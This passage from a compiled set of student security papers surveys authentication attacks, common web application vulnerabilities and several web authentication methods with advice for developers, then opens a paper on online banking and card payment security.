the chances for associating a password In addition, software could be used to
scramble the contents of the dictionary as a means of locking in on any random
collections of letters. The hacker may also include numbers and various types of
punctuation in this random mix, making the chances of identifying more complex
passwords a possibility. While this approach could be very effective when a single
word is used for the password, it is much less likely to succeed if the user has utilized
a rather complicated password.
Pharming. Pharming is a type of Internet fraud in which the attacker attempts to
redirect Internet users from legitimate websites to fraudulent or potentially malicious
ones. It is somewhat similar to phishing [10]. Pharming, however, attempts to redirect
users to fraudulent websites without any type of bait message or other action by the
users. Pharming attacks try to inherently corrupt the process by which a user accesses
Internet websites. This is to redirect the user to a malicious website without the user
ever knowing he/she is under-attacked. This process can be achieved by either
through a compromised Domain Name System (DNS) server or through a
compromised router or network.
Compromised Domain Name System (DNS) Server. DNS servers direct Internet users
to websites by converting textual hostnames such as www.google.com into numerical
Internet protocol (IP) addresses that servers recognize. By poisoning a DNS server, a
pharming attack allows an attacker to redirect large numbers of users from the
legitimate website to a malicious website, without the users ever realizing an attack
has happened [10]. The users typed the correct hostname but would be directed by the
poisoned DNS server to the IP address of the malicious website. This malicious
website could then either install malicious software onto the users’ computers, or
appear legitimate and wait for the users to enter their private information and collect
them for fraudulent purposes.
Compromised router or network. This could be attained through malicious software
that rewrites the firmware built into the device [10]. Firmware is the software
installed within a device itself which manages the basic functions of the device
regardless of other hardware or software used with it. In the case of routers and
network servers, the firmware usually comprises of directions for which DNS server
system should use. So, a pharming attack could potentially change this firmware to
tell the router to use a specific DNS server that is either controlled by the attacker, or
that has already been poisoned. Antivirus and firewall programs, on the whole, cannot
protect users from pharming attacks. More sophisticated programs are needed to
secure network servers and routers.
221
Malware on Client Machines.
Spyware. Spyware are programs that utilize users’ Internet connection, normally
without their knowledge or permission, to send information from their personal
computer to other computer. [9] The information sent could be a record of ongoing
browsing habits, downloads, or even personal data.
Session Hijacking, Fabricated Transactions. Session hijacking happens when a third
party takes over a web user session by obtaining the session key and pretending to be
the authorized user of that key [8]. Once the hijacker has successfully initiated the
hijacking, he/she can use any of the privileges connected with that user to perform
tasks, including use of information that are being passed between the original user and
any participants. Depending on the type of actions made, session hijacking may either
be promptly noticeable to all participants involved or be almost undetectable.
The procedure of session hijacking focuses on the protocols used to establish a user
session. The session ID is typically stored in a cookie or embedded in a URL. Some
form of authentication on the user is required to initiate the session. The hijacker can
then make use of defects in the security of the network and capture the important
authentication information. Once the user is identified, the hijacker can monitor every
data exchange that takes place during the session and use those data in any way he/she
desires.
1.4 Vulnerability of Web Applications
While there are protective measures to identify and remove vulnerabilities, those
measures may not be well implement or sufficient, as such, vulnerabilities still exist in
web applications. Five common web application attacks will be discussed, according
to their critical rate from highest to lowest.
Remote Code Execution. Improper coding errors lead to remote code execution. It
allows an attacker to run arbitrary, system level code on the vulnerable server and
retrieve any desired information [11]. Exploitation of this vulnerability can also lead
to a total system compromise with the same rights as the Web server itself. It is
difficult to discover this vulnerability during penetration tests but problems are often
revealed while doing a source code review.
SQL Injection. An attacker is able to retrieve crucial information from a Web
server's database through SQL injection [11]. The impact of the attack varies from
basic information disclosure to remote code execution and total system compromise,
depending on the application's security measures.
Format String Vulnerabilities. This vulnerability results from the use of unfiltered
user input as the format string parameter in certain Perl or C functions that perform
formatting [11]. An attacker can make use of %s, %x and %d, %u or %x to perform
222
denial of service, reading and writing attacks where the attacker can cause a program
to crash, has unauthorized access to information and edit data, respectively.
Cross-Site Scripting (XSS). An attacker could craft a URL which appears to be
legitimate at first look but when the victim opens the URL, the attacker can
effectively execute something malicious in the victim's browser [11].
Username Enumeration. An attacker can make use of the vulnerability of the
backend validation script to tell the attacker if the supplied username is correct or not
[11]. By being able to do so, the attacker would be able to determine valid usernames
from the type of different error messages he/she received.
2 Password Authentication
Password authentication is the process of determining the identity of an individual
who is accessing a system. It is typically achieved via a logon process with web user
ID or usernames, passwords and/or e-mail. It includes the setup process where the
user chooses his/her password and the hash of the password will be stored in a
password file. Later, when the user logs into the system by supplying his/her
password, the system computes the hash of the password entered and compares to the
file. Once the hash and the file match, the user has been authenticated; he/she can then
be authorized to perform certain actions within the system. Various password
authentication methods will be discussed below.
Methods of Password Authentication
HTTP Basic Authentication. Basic HTTP authentication is called so because it is
defined in Hypertext Transfer Protocol (HTTP) standard. When a request is made
from a client to a web browser, it sends a message header in the form: “wwwAuthenticate: Basic” [24]. The web browser or client provides a username and
password while making a request to the server. The username is concatenated with the
password in Base64 encoding. The string in Base 64 encoding is then sent to the
server to be decoded. The result is a colon separating the username and password. For
instance, the username HarryPotter and password Gryffindor would appear as the
string ‘HarryPotter:Gryffindor’
Implementation of Basic Authentication. A client requests access to a protected
resource. The web server returns a dialog box that asks for the username and
password of the client. The client then submits his/her username and password to the
server and awaits validation. The server validates the credentials and if successful, the
server returns the requested resource to the client.
223
Fig 1. Using HTTP Basic Authentication to authenticate a client to a server. (Source:
http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)
Fig 2. HTTP basic authentication to connect to a secured server: requesting a username and
password. (Source: http://wiki.openqa.org/display/WTR/Basic+Authentication)
Advantages and Disadvantages of HTTP Basic Authentication
Advantages: Basic access authentication supports all web browsers, in other words, it
is a relatively simple scheme to implement. Sessions are stored in caches. This allows
the user to enter the server multiple times without having to log in each time.
Disadvantages: HTTP basic authentication is not particularly secure. Basic
authentication sends usernames and passwords over the Internet as plaintext that is
not encrypted. Thus, it relies on the connection to be secure or trusted such that no
interception occurs. This may be a problem too as the target server is also not
authenticated, increasing the possibilities for man-in-the-middle attacks.
Although the caching of sessions serves as a convenience, it is also insecure.
Information is retained in session caches until the user clears his/her browsing history.
This means that if the user does not properly log off the server, his/her information is
still within the cache and another user would be able to access his/her session without
any passwords required [16].
224
Form Based Authentication. Form based authentication may seem somewhat similar
to HTTP basic authentication. However, it does not use HTTP authentication
techniques. Instead, it uses HTML form fields for the username and password values
[16].
Implementation of Form Based Authentication. When using form based
authentication, the server first checks the client’s user authentication. If the user is
authenticated, the server returns a reference of the requested resource. Otherwise, the
user is presented with a ‘form’ to fill in, giving rise to the naming of the method. He
fills in the form before being granted access to a particular site, similar to a login. If
the login succeeds, the server redirects the client to the resource. Upon failure, the
client is redirected to an error page.
Fig 3. Using Form Based Authentication to authenticate a client to a server (Source:
http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)
Advantages and Disadvantages of Form Based Authentication
Advantages: Sessions are timed. This means that after a certain amount of idle time or
inactivity, the session would end and the user would be required to log in to the server
again. This increases the security slightly from HTTP basic authentication in the
instance when a user forgets to log off his/her session. It is particularly useful for
public access machines such as computer terminals in airports and LAN shops.
Disadvantages: Form based authentication has the same security issues as basic
HTTP authentication, where passwords are sent in plaintext. The target server is also
not authenticated.
Client-Certificate Authentication. Client certificate authentication uses HTTP over
Secure Sockets Layer (SSL). This procedure does not occur at the message layer
using user IDs and passwords or tokens. Instead, the authentication occurs during the
handshake using SSL certificates. [27]
225
Implementation of Client-Certificate Authentication. The server authenticates the
server through public key certificates, which essentially use a digital signature to bind
a public key with an identity – information like the name of the person or the
organization, making it a secure. The public key certificate is issued by a trusted
organization, a certificate authority (CA) for instance, VeriSign [18],[29].
The authentication uses public-key encryption and digital signatures to confirm that
the server is who he claims to be. Upon authentication, the client and server use
symmetric-key encryption to encrypt all the information exchanged.
Advantages and Disadvantages of Client-Certificate Authentication
Advantage: Authenticity is offered in the verification of the owner through the
additional information given such as the name of the person or the organization. It is
confidential in that it ensures the data transferred is not disclosed to unauthorized
people. Because it is secure, it ensures that any modification of data is done only by
the authorized person or company. As such, any modification or transaction cannot be
denied by the participant, enduring non-repudiation [13],[17].
Disadvantage: Cost is the main disadvantage. In order to obtain a trusted
infrastructure, the user needs to validate his/her identity with a trusted organization
such as VeriSign [28]. Another disadvantage may be the performance due to the
larger amount of resources required since the information sent is encrypted.
Fig 4. Client-certificate authentication utilized in PayPal as a proof to clients that it is a
legitimate server. Certificate is verified by VeriSign. (Source: RedHat, Certificates and
Authentication)
Mutual Authentication. Mutual Authentication, which is also known as two-way
authentication, is a security feature or process in which both entities in a
communications link authenticate each other. In a network environment, the end user
(client side) must prove his/her identity to a web application provider (server side),
226
and the server must prove its identity to the client, before any application traffic is
sent over the connection. In other words, a connection can occur only when the client
trusts the server's digital certificate and the server trusts the client's certificate [33].
Mutual authentication should not be confused with the two-way factor which
electronic banking websites normally implements.
Implementation of Mutual Authentication. The exchange of certificates is carried out
by means of the Transport Layer Security (TLS) protocol. After the process of
exchanging certificates and setting up connection properties which is called the
Secure Sockets Layer (SSL) handshake, a connection is only possible. If the client's
keystore contains more than one certificate, the certificate with the latest timestamp is
used to authenticate the client to the server [25]. This reduces the risk that an
unsuspecting network user carelessly reveals account credentials to malicious
websites. It is best to be implemented with HTTP over SSL for added security.
Fig 5. Using Mutual Authentication to verify the authenticity of both the client and server.
(Source: http://download.oracle.com/javaee/1.4/tutorial/doc/Security5.html)
Advantages and Disadvantages of Mutual Authentication
Advantage: By using the mutual authentication method, end users can be assured that
they are communicating with legitimate web applications, and servers can ensure that
all users are attempting to gain access for legitimate purposes. It prevents attackers
from impersonating entities to steal users’ account credentials in order to commit
fraud [15]. Mutual authentication can also prevent various forms of online fraud such
as man-in-the-middle attacks, malware, shoulder surfing, keystroke logging and
pharming. It minimizes the risk of online fraud in electronic banking or commerce
activities.
227
Disadvantage: However, most web applications are designed in such a way that no
client-side certificates are required [14]. This is because of the issues with cost and
complexity. Hence, the lack of mutual authentication will create opportunity for manin-the-middle attacks. Besides that, the management of root certificate authorities in
client browsers, applications and operating systems is relatively important. For
example, the attacker can explicitly change the digital certificate of certificate
authorities (CAs) in client browsers to trick the client into believing a malicious
website is legitimate.
Digest Authentication. Digest authentication is an authentication method in which a
request from a potential user is received by a network server and then sent to a
domain controller [30]. The controller will return a digest session key to the server
that received the request. Subsequently, the user has to generate a response which is
encrypted before sending it to the server. If the response is correct, the server grants
permission on the user access to the web application for a single session.
Implementation of Digest Authentication. The authentication is based on a simple
challenge-response paradigm. Server generates challenges using a nonce value. A
valid response from client contains a MD5 checksum (by default) of username,
password, nonce value provided, HTTP method, and requested URI. This form of
response is specified in RFC2617 [24]. The MD5 digest value is a 128-bit hash value
which is intended to be a one-way message digest, but there are studies shown that
MD5 is breakable and not collision resistant [33].
Advantages and Disadvantages of Digest Authentication
Advantage: Digest authentication is developed to tackle the fundamental problem of
basic authentication which is the plaintext transmission of user’s password over
physical network. The user’s password is not used directly in the MD5 digest, thus it
allows some implementations to store the digest values instead of the plaintext
password. Client nonce in the response allows the client to prevent chosen-plaintext
attacks. The server nonce can include timestamps, allowing the server to inspect
nonce attributes sent by clients to prevent replay attacks. Lastly, the server is allowed
to maintain a list of recently issued server nonce values to prevent reuse.
Disadvantage: In general, digest authentication is an enhanced form of single factor
authentication. A single factor authentication is vulnerable to man-in-the-middle
attacks. It has no mechanism for clients to identify the server’s legitimacy.
Furthermore, most of the security options specified in RFC 2617 are optional. If the
server is not strict in the quality of protection, the client might operate in a lower
security RFC 2069 digest authentication. This authentication is also vulnerable to a
man-in-the-middle attack as an attacker can instruct the clients to use a RFC2069
digest authentication [23]. Another weakness lies in the passwords that must be stored
in a reversibly encrypted from, thus the server can access and run them through
checksum algorithms [26]. This authentication method is not as secure as client
certificate authentication or mutual authentication but it is better than basic access
authentication.
228
Kerberos. Kerberos was created by Massachusetts Institute of Technology as a
solution to network security problems. Kerberos is a network authentication protocol,
designed to provide strong authentication for client/server applications using secretkey cryptography. It provides tools of authentication and strong cryptography over the
network to help a client prove its identity to a server (and vice versa) across an
insecure network connection [3]. After which, communication between the client and
server will be encrypted to assure privacy and data integrity.
Implementation of Kerberos. Kerberos works by encrypting data with a symmetric
key where the details are sent to a key distribution center (KDC) instead of directly
between each computer. The KDC maintains a database of secret keys where each
entity on the network (either client or server) shares a secret key known only to itself
and to the KDC [19]. The KDC consists of two logically separate parts: an
Authentication Server (AS) to prove an entity's identity using knowledge of the secret
key and a Ticket Granting Server (TGS) to generate a session key for encrypting
transmissions during communication.
When the client logs in with its password, the AS verifies the client's identity and
grants it a Ticket Granting Ticket (TGT) [20]. The TGT contains identification
credentials such as a randomly-created session key and a timestamp of eight hours.
When the client wants to contact some service server (SS), the client then contacts the
TGS, using the ticket to prove its identity and asks for a service. The client can
(re)use this ticket as long as it is not expired. If the client is eligible for the service,
the TGS sends another ticket to the client. The client then contacts the SS and uses the
latter ticket to authenticate itself and prove that it has approval to receive the service.
Advantages and Disadvantages of Kerberos
Advantages: Kerberos protocol messages are protected against eavesdropping and
replay attacks [1]. Users’ passwords are never sent across the network, neither in
encrypted or in plain text, preventing password sniffing [12]. In addition, secret keys
are only sent across the network in encrypted form. Hence, contents of snooped and
logged conversations on an insecure network do not contain enough information for
an attacker to impersonate an authenticated user or an authenticated target service.
Kerberos also input timestamps and lifetime information in the tickets passed between
clients and servers to secure communications within the network [12]. By using use
short enough ticket lifetimes that is no longer than the estimated time for a hacker to
crack the encryption of the ticket helps prevent brute-force and replay attacks.
Furthermore, due to time-outs, users had to periodically request for new
authentication and thus hackers would constantly encounter new cryptographic
ciphers to decode and hence insufficient time to break the cipher.
Kerberos supports mutual authentication which helps to prevent man-in-the-middle
attacks as the client and server systems mutually authenticate each other and are
certain that they are communicating with genuine partner who claims to be who he is
[21].
229
Apart from being an authenticating protocol itself, Kerberos could also be integrated
to secure a second factor authentication, such as a one-time password (OTP).
Furthermore, Kerberos provide a layer of security where by firewall could not
depended on.
Disadvantages: In general, Kerberos system requires continuous availability of a
central server thus, if the Kerberos server is down, no one will be able to log in [3].
Kerberos is also not useful for persistence connection due to the limiting lifetime of
tickets and session keys used for encryption. As tickets are time-stamped, Kerberos
has strict time requirements and require the clocks of the involved hosts to be
synchronized within the configured limits. The authentication will fail if the clock
times are more than five minutes apart.
The Kerberos authentication model is also vulnerable to brute-force attacks against
the KDC [12]. Since the entire authentication system of Kerberos is dependable on
the KDC, any compromise of the KDC will allow an attacker to impersonate any user.
As Kerberos was designed for use with single-user client systems but not all client
systems are single-user systems [12]. In the case of multi-user system, the Kerberos
authentication scheme can still be susceptible to a variety of ticket-stealing and replay
attacks.
3 Suggestions to Web Developers
Web developers intending to secure their applications would have to consider the
different kinds of password authentication methods to employ to suit their web
applications. Some factors to consider that may affect the choice of authentication
would be cost and efficiency issues.
Twitter and Basic Authentication. Before 10th August 2010, Twitter made use of
basic authentication for logging into the Twitter server. The switch to another form of
authentication, Open Authorization (OAuth) was made due to the lack of security that
basic authentication provides. With basic authentication, the client provides his/her
username and password to third parties over the network in plaintext whenever a new
page is requested. This makes it very easy for packet sniffers to intercept passwords.
Also, the server stores passwords, making it a liability in the case when passwords are
leaked.
In addition to that, the performance of basic authentication is rather inefficient. Every
page requested by the client would require a lookup for the user in the database. This
would result in a less efficient server, especially when a large number of people are
using the server.
230
Therefore, although basic authentication is the simplest form of authentication that
one can make use of, it is not particularly secure and is easy to hack if and when any
malicious attempt is made. Unless the web application is not particularly in need of
any security, in the case of a simple personal project, then basic authentication might
be used. However, in the instance of a more secure environment, such as banking
services, basic authentication should not be used.
Facebook and HTTPS. Facebook, one of the most popular social media sites used by
millions around the world would require a reasonable level of security. The numerous
photos posted on Facebook with people tagged require a higher level of security for
the sake of personal privacy. The developers of Facebook realize the need for such
security and have obtained SSL certificates which allow users to browse over HTTPS.
Some issues regarding HTTPS are cost and latency. The cost for licensing the
certificate is approximately over $1,000 for a single year alone. It is due to the high
costs that some web developers shun away from these licenses, to keep costs at a
minimum. However, in the case of Facebook, this cost is essential and should not be
avoided to secure the privacy of the millions of users.
Latency is due to the fact that there are more steps to carry out for verification
(‘handshakes’) as opposed to basic authentication. These extra handshakes are
necessary in HTTPS authentication before data is sent to the client. Nevertheless, the
slight latency is a small price to pay for security. In fact, with the advancement of
technology, latency would be improved as networks develop.
Financial Industry and Mutual Authentication. In the financial industry, both users
and banking systems need assurance that each party is authentic. This is important to
make sure that bank customers would not leak their credential information to phishing
websites, while the system would only allow bank customers to access. Mutual
authentication is considered to be a secure method for this authentication process.
However, there are not many financial organizations implement it. It is because of the
high implementation cost. The cost of getting a public key certificate issued by a
trusted organization, a certificate authority (CA) such as VeriSign is expensive.
Hence, it is hard for general users to obtain a public key for the servers to identify.
Bank customers can verify the public key of an Internet banking website such as DBS
Bank Ltd (internet-banking.dbs.com.sg) since the identity of DBS Bank Ltd has been
verified by VeriSign. Users can be assured that they are communicating with the
legitimate DBS website. On the other side, DBS web server is unable to check the
legitimacy of individual clients based on their digital certificates. The web server will
attempt to match the signature on the client certificate to a known CA using the web
server's certificate store. If the client’s certificate is not registered under any CA, the
web server which is using mutual authentication can simply refuse to accept
connections from that client who is not authenticated. Hence, the banking systems
231
have to use other security methods such as two-way factor authentication which
involves a token and a password to make the authentication process more robust.
Digest Authentication. Nowadays, there are more e-commerce websites which are
using SSL to protect the users’ login credentials. The websites often buy a costly SSL
server digital certificate from CA and only use it for authentication. It is because the
SSL encryption routine will seriously tax a web server when overload. For example,
Microsoft Hotmail only uses SSL to encrypt its users’ login page then switches to
unencrypted HTTP after that. Even though SSL is used, many web applications still
store users’ password in plain text in database. An attacker can easily retrieve all the
credential information if the web server is compromised.
Hence, digest authentication is a fairly secure and cheaper authentication method to
be considered by web application developers. Using digest authentication, users’
login credentials are never transmitted across the network, nor are they stored in
database in plain text. Web developers with less financial resources do not need to
purchase expensive digital certificates every year. Furthermore, the authentication is
performed by web server itself, the web application just have to ensure that
authentication is in placed. Digest authentication protocol uses hashes instead of plain
text. Web developer may develop their own hash authentication mechanism but it is
much reliable to use existing digest mechanism. However, digest authentication is
suitable only to protect username and passwords. SSL is still the best method if the
content transmitting needs to be protected or the users need assurance that they are
connecting to the legitimate server. Web application developers have to take note that
digest authentication is a single factor authentication and thus subject to weaknesses
of traditional authentication methods.
Kerberos. Kerberos comes as a viable and powerful solution to network security
problems. It is an open standard managed by the Internet Engineering Task Force
(IETF) [19]. Many operating systems such as IBM’s AIX, Apple’s Linux and
Microsoft’s Windows are using it for authentication for most of their login modules
[22]. In addition, many remote login applications available on UNIX-like Open SSH,
telnet, rlogin have Kerberized versions. Kerberos is used by both mainstream vendors
and other open source [32]. Numerous improvements had been made to Kerberos as
the working model matures over the years. Kerberos is now able to support multiple
cryptographic algorithms, scalable systems and others more. Given that Kerberos is
mature, in place in many operating systems and application and being architecturally
sound [22], it is a very feasible authentication system to use.
While Kerberos is very much stable and secure now, there may be a deterrence factor
for users not to use it. Kerberos are much more complicated than the other
authentication methods discussed and thus, to simplify things, web developers may
shun away from this method. Cost may be another factor but Kerberos system is
available free on open source platforms. However, one thing to note is that the
232
Kerberos system provided by open source and commercial may differ so developers
need to weigh the factors well when choosing the Kerberos system to use.
4 Conclusion
In conclusion, we have started off discussing the vulnerability of web applications,
the possible authentication attacks, authentication methods that could help to counter
some of the attacks and ended with evaluation of the authentication methods and
giving some suggestions for web developers to consider when choosing
authentication methods. The future technology will change and new hacking methods
may occur and subsequently, authentication methods will need to change
correspondingly to counter those attacks. There is no one perfect solution to security
problems. Web developers will have to continuously review their authentication
techniques to protect the privacy of their systems and users.
233
Table 1. Overview of comparison among different authentication techniques.
Basic
Authentication
Form-based
Authentication
HTTPS/SSL
Mutual
Authentication
Digest
Authentication
Kerberos
Low
Low
High
High
Medium
High
Methods
Passwords sent as
plaintext.
Passwords sent as
plaintext. Logout
after inactivity of
certain period
Client
authenticates
server through
public key
certificates
Exchange of
certificates
between client
and server.
Simple challenge
response paradigm
with digest session
key.
Passwords are never
sent across the
network.
Only secret keys in
encrypted form are
sent.
Vulnerability
Man in the middle
attacks.
Man in the middle
attacks
Possibility of
server’s public
key being altered,
leading to client
believing (altered)
key is legitimate.
Most web
applications do
not required client
side certs.
Man in the middle Brute-force attacks
attacks
against the KDC
Password stored in a Susceptible to
reversibly encrypted ticket-stealing and
form.
replay attacks
No mechanism to
identify server’s
legitimacy.
Security level
234
References
1.
Aldinger, T. (n.d.). What Are the Advantages of Kerberos?| eHow.com. Retrieved
October 15, 2011, from eHow: http://www.ehow.com/list_5981928_advantageskerberos_.html
2.
Arumugam, P. (2002, December 12). J2EE Form-based Authentication. Retrieved
October 13, 2011, from O'Reilly on Java:
http://onjava.com/pub/a/onjava/2002/06/12/form.html
3.
Bezroukov, N. (2010, May 06). Kerberos. Retrieved October 14, 2011, from
Softpanorama: http://www.softpanorama.org/Authentication/kerberos.shtml
4.
Conjecture Corporation. (2011). What is a Brute Force Attack. Retrieved October 8,
2011, from WiseGeek: http://www.wisegeek.com/what-is-a-brute-force-attack.htm
5.
Conjecture Corporation. (2011). What is a Dictionary Attack. Retrieved October 8,
2011, from WiseGeek: http://www.wisegeek.com/what-is-a-dictionary-attack.htm
6.
Conjecture Corporation. (2011). What is a Phising Scam. Retrieved October 8, 2011,
from WiseGeek: http://www.wisegeek.com/what-is-a-phishing-scam.htm
7.
Conjecture Corporation. (2011). What is Network Sniffing. Retrieved October 9,
2011, from WiseGeek: http://www.wisegeek.com/what-is-network-sniffing.htm
8.
Conjecture Corporation. (2011). What is Session Hijacking. Retrieved October 8,
2011, from WiseGeek: clear answers for common questions:
http://www.wisegeek.com/what-is-session-hijacking.htm
9.
Conjecture Corporation. (2011). What is Spyware. Retrieved October 8, 2011, from
WiseGeek: http://www.wisegeek.com/what-is-spyware.htm
10. Conjecture Corporation. (2011). What is Pharming. Retrieved October 8, 2011, from
WiseGeek: http://www.wisegeek.com/what-is-pharming.htm
11. Doshi, P., & Siddharth, S. (2010, November 2). Five common Web application
vulnerabilities. Retrieved October 9, 2011, from Symanec Connect:
http://www.symantec.com/connect/articles/five-common-web-applicationvulnerabilities
12. Duke University. (n.d.). Kerberos: Advantages and Weaknesses. Retrieved October
15, 2011, from Duke University: http://www.duke.edu/~rob/kerberos/kerbasnds.html
13. Dun & Bradstreet. (n.d.). Trust in Secure Identity. Retrieved October 3, 2011, from
Dun & Bradstreet:
http://www.dnb.com/US/communities/ecommerce/trust_secure.asp
14. Federal Financial Institutions Examination Council. (2001). Authentication in an
Internet Banking Environment. Retrieved October 15, 2011, from Federal Financial
Institutions Examination Council:
http://www.ffiec.gov/pdf/authentication_guidance.pdf
235
15. Financial Services Technology Consortium. (2005). FSTC Blueprint for Mutual
Authentication: Phase 1. Retrieved October 15, 2011, from Financial Services
Technology Consortium:
http://www.fstc.org/projects/docs/FSTC_Better_Mutication_v11.pdf
16. GlobalSCAPE, Inc. . (n.d.). GlobalSCAPE Knowledge Base. Retrieved October 7,
2011, from GlobalSCAPE:
http://kb.globalscape.com/KnowledgebaseArticle10691.aspx
17. IBM. (2010, September 20). Secure Sockets Layer client certificate authentication.
Retrieved September 24, 2011, from IBM: WebSphere Application Server:
http://publib.boulder.ibm.com/infocenter/wasinfo/v6r0/index.jsp?topic=%2Fcom.ibm
.websphere.express.doc%2Finfo%2Fexp%2Fae%2Frsec_csiv2cca.html
18. IIS Admin Blog. (2007, October 8). How to Secure a Web Site Using Client
Certificate Authentication. Retrieved September 24, 2011, from IIS Admin Blog:
http://www.iisadmin.co.uk/?p=11
19. Kerberos (protocol) - Wikipedia, the free encyclopedia. (n.d.). Retrieved October 14,
2011, from Wikipedia: http://en.wikipedia.org/wiki/Kerberos_(protocol)
20. Learn Networking. (2008, January 28). How Kerberos Authentication Works : LearnNetworking.com. Retrieved October 15, 2011, from Learn Networking: http://learnnetworking.com/network-security/how-kerberos-authentication-works
21. McGowan, L. (2011, June 02). What Are the Advantages of Kerberos
Authentication?| eHow.com. Retrieved October 15, 2011, from eHow:
http://www.ehow.com/info_8527576_advantages-kerberos-authentication.html
22. MIT Kerberos Consortium. (2008). kerberos.org. Retrieved October 25, 2011, from
Kerberos: http://www.kerberos.org/software/whykerberos.pdf
23. Network Working Group. (1997). An Extention to HTTP: Digest Acess
Authentication. Retrieved October 10, 2011, from Network Working Group:
http://tools.ietf.org/html/rfc2069
24. Network Working Group. (1999). HTTP Authentication: Basic and Digest
Authentication. Retrieved October 15, 2011, from Network Working Group:
http://tools.ietf.org/html/rfc2617
25. Oiwa, Y. (2008). HTTP Mutual Authentication Protocol Proposal. Research Centre
for Information Security.
26. Open Web Application Secutiry Project Foundation. (2010). Authentication in IIS.
Retrieved October 16, 2011, from Open Web Application Secutiry Project
Foundation: https://www.owasp.org/index.php/Authentication_In_IIS
27. Red Hat. (n.d.). Red Hat. Retrieved October 3, 2011, from Red Hat Certificate
System: http://docs.redhat.com/docs/enUS/Red_Hat_Certificate_System/8.0/html/Deployment_Guide/Introduction_to_Publi
c_Key_Cryptography-Certificates_and_Authentication.html
236
28. SSL Shopper. (2011). Why SSL? The Purpose of using SSL Certificates. Retrieved
October 13, 2011, from SSL Shopper: http://www.sslshopper.com/why-ssl-thepurpose-of-using-ssl-certificates.html
29. Sun Microsystems. (2005, December 6). Installing and Configuring SSL Support .
Retrieved September 24, 2011, from The J2EE(TM) 1.4 Tutorial:
http://java.sun.com/j2ee/1.4/docs/tutorial/doc/Security6.html#wp80737
30. Tech Target. (2007). Digest Authentication. Retrieved October 15, 2011, from Tech
Target: http://searchsecurity.techtarget.com/definition/digest-authentication
31. Tech Target. (2007). Mutual Authentication. Retrieved October 15, 2011, from Tech
Target: http://searchfinancialsecurity.techtarget.com/definition/mutual-authentication
32. University of Portsmouth. (2007, November 27). Kerberos- Commercial or Open
Source? Retrieved October 25, 2011, from University of Portsmouth:
http://mosaic.cnfolio.com/M591CW2007B103
33. Wang, X., & Yu, H. (n.d.). How to Break MD5 and Other Hash Functions. Retrieved
October 15, 2011, from http://merlot.usc.edu/csac-f06/papers/Wang05a.pdf
34. Zaikin, M. (2005, March). Chapter 5. Web Application Security. Retrieved October
11, 2011, from SCWCD 1.4 Study Guide: http://java.boot.by/wcdguide/ch05s03.html
237
238
Data Security for E-transactions:
Online Banking and Credit Card Payment System
Jun Lam Ho, Alvin Teh, Kaldybayev Ayan
Abstract. In this paper, we will explore the environment and protocols used for
online banking and credit card payment system including Secure Electronic
Transaction (SET), 3D Secure, Hypertext Transfer Protocol Secure (HTTPS)
etc. Subsequently, we will study the threats commonly faced by these systems.
Finally, we will be analyzing the current systems while offering alternative
ways that may help to resolve the problem, which is the insecurity of the
current E-transactions systems.
1
Introduction
Today, in a generation of IT technologies, electronic transactions have made buying
and selling products easy and comfortable. An electronic transaction is the sale or
purchase of goods or services whether between business, individuals, governments
and other public or private organizations conducted over electronic systems such as
the Internet or other computer mediated network. The payment for goods can be done
using credit-card payment (offline) or online banking payment (online). Both of these
methods of paying is widely spread around the world and plays important role in
making payment convenient for both parties.
Online banking (or Internet banking) allows customers to conduct financial
transactions on a secure website operated by their retail or virtual bank, credit union
or building society. The ancestor of the modern online banking services was the
distance banking services over electronic media from the early 1980s. And it became
popular with a use of terminal (with keyboard and monitor) to access the banking
system using a phone line. It also had another feature such as sending tones down a
phone line with instructions to the bank. That time some online banking services were
never popular due to the commercial failure. However, today, in a world of new
technologies, many banks are Internet only banks. Unlike their predecessors, banks
today differentiate themselves by offering better interest rates and online banking
features.
Another popular type of payment today is the payment using payment cards.
The payment card covers a range of different cards that can be presented by a
cardholder to make a payment. It is basically attached to an account which has funds
239
in it. Payment cards can be classified into categories such as: credit card, debit card,
charge card, stored-value card and fleet card. Out of these types of cards the most
popular ones are credit card and debit card. Credit card as well as debit card provide
and alternative payment method to cash when making purchases.
Costumers can also choose between the variety of E-check and E-cash
systems. Electronic money or E-cash refers to money that is only exchanged
electronically. Electronic money systems fall under 3 categories like centralized,
decentralized and offline anonymous systems.. E-cash systems such as PayPal,
WebMoney, cashU functions as a centralized system. They sell their electronic
currency directly to the end user. They have become popular too, since they allow
using online money transfers as electronic alternatives to paying with traditional paper
methods, such as checks and money orders.
Although, new technologies make purchasing and selling goods convenient,
and make online shopping possible, there is another problem which concerns users of
these systems: “Is it safe?”. Security is the most crucial part when it comes to Etransactions. Without proper security it may lead to be under attacks of hackers,
frauds. It will cause a lot of damage such as mainly loss of funds and exposing private
information of customers. Security is critical to the success of electronic commerce
over the Internet; without privacy, consumer protection cannot be guaranteed, and
without authentication, neither the merchant nor the consumer can be sure that valid
transactions are being made. That is why all popular E-transaction systems are mostly
pay attention to security of their systems and their costumers.
1.1 Expanded CIA factors for e-transaction
E-transaction systems handle a huge number of transactions involving large sum of
money and sensitive customer information. These systems operate under a set of
security protocols and environment which differs from other information systems.
The main difference comes from the information these systems are handling which is
defined by a set of characteristics. We will take a look at the characteristic of
information which closely relates to e-transaction systems to gain a better
understanding of the protocols and environment used to run these systems.
Confidentiality refers to the non-disclosure of information to unauthorized personnel.
This is achieved by means of authentication provided by the e-transaction system
which grants authorized user access rights to the account they hold
Integrity refers to the information being free from corruption and exist as a complete
form. Hashing is one of the method used to verify the integrity of information.
Availability refers to the ability of authorized user to gain access to information when
needed without obstructions.
Authenticity refers to the quality of the information being genuine or original. This is
achieved together with non-repudiation by means of digital signatures and public key
encryption.
240
Accuracy refers to the information being free from error.
2
Protocols and Systems
2.1 Online shopping and payment
SET Protocol
Payment card systems use mostly uses Secure Electronic
Transactions (SET). The Secure Electronic Transaction (SET) is an open encryption
and security specification that is designed for protecting credit card transactions on
the Internet. It was developed by payment card companies such as Visa and
MasterCard, and was supported my IBM, Microsoft, Netscape and other companies. It
is a standard for protecting the privacy and ensuring the security of electronic
transactions. With SET, a customer is given an electronic wallet (digital certificate)
and a transaction is controlled using a digital certificates and digital signatures among
3 member party: purchaser, a seller, and the purchaser’s bank. SET uses variety of
security systems such as: Netscape’s Secure Sockets Layer, also known as SSL,
Terisa System’s Secure Hypertext Transfer Protocol (S-HTTP or HTTPS) and
Microsoft’s Secure Transaction Technology (STT).
So what kind of encryption mechanisms does the SET use?
The SET protocol uses different encryption mechanisms, as well as
authentication mechanism. The SET uses both symmetric and asymmetric (public
